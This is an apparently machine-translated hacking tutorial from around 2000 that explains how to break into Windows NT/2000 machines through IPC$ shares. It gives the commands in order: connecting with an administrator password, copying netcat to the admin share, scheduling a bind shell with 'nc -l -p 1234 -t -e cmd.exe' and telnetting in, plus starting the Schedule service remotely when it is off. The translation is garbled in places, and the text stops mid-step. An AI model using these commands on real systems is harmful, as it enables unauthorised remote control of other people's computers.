IPC invading all Raiders By Analysist http://www.china4lert.org declaration: In fact, it is actually a lot of tutorials for IPC vulnerabilities. However, many tutorials are incomplete, so there are still many netizens to ask me about IPC vulnerabilities. The invasion is related to the question, this is the reason I wrote this article. If you feel that this article is incomplete, then go to a better version, but I hope that you can tell me your opinions and suggestions, let me constantly improve this article. This article refers to Xiaoyu's streamer 2000 to explain documentation and other related documents, and it also contains some own experience. This article welcomes non-commercial reprint, but please keep the articles integrity and indicate the source! :-) IPC is an abbreviation of Internet Process Connection, which is a remote network connection. It is a one-character feature that Windows NT and Windows 2000, which is characterized by only one connection between two IPs. Ok, talk less, now enter the theme. How do I find a host with IPC vulnerability? I used to combine a foreign scan tool (name I forgot) and Killusa's Letmein, because many work is done, so speed can be imagined. Now because there is a lot of flow light 2000, it is too simple to find such a host. If I don't say it, you can refer to the documentation of the software. Ok, suppose we have found a host, the address is 139.223.200.xxx, the administrator account is administrator, the password is 123456. Enter the command line method, formally start. It should be noted that the following operations are performed in the target host without disabled remote IPC $ connection and starting the Schedule service. F: /> NET Use //139.223.200.xxx/IPC ("123456" / user: "administrator" command successfully completed. F: /> Copy nc.exe //139.223.200.xxx/admin full files have been copied. F: /> Net time //139.223.200.xxx //139.223.200.xxx's current time is 2000/12/25 10:25 am in //139.223.200.xx's local time (GMT - 07:00 ) Is 2000/12/25 at 10:35 am to successfully complete. F: /> at //139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe added a job, its job ID = 0 f: /> Telnet 139.223.200.xxx 1234 The command above is very simple, you only need to refer to NET, AT and NC usage. In this way, we boarded the remote host. The ideal situation is like this, but maybe you will encounter the SCHEDULE service of the target host without starting, then the AT command cannot be used, we need to add the following steps. F: /> at //139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe service has not started. F: /> Netsvc //139.223.200.xxx Schedule / Start Service Is Running ON //139.223.200. What can we do after mounting a remote host? This is determined depending on the permissions of this account and the security policy of the host. If your permissions are not enough, you can try the steps below. First, the following command is executed locally.
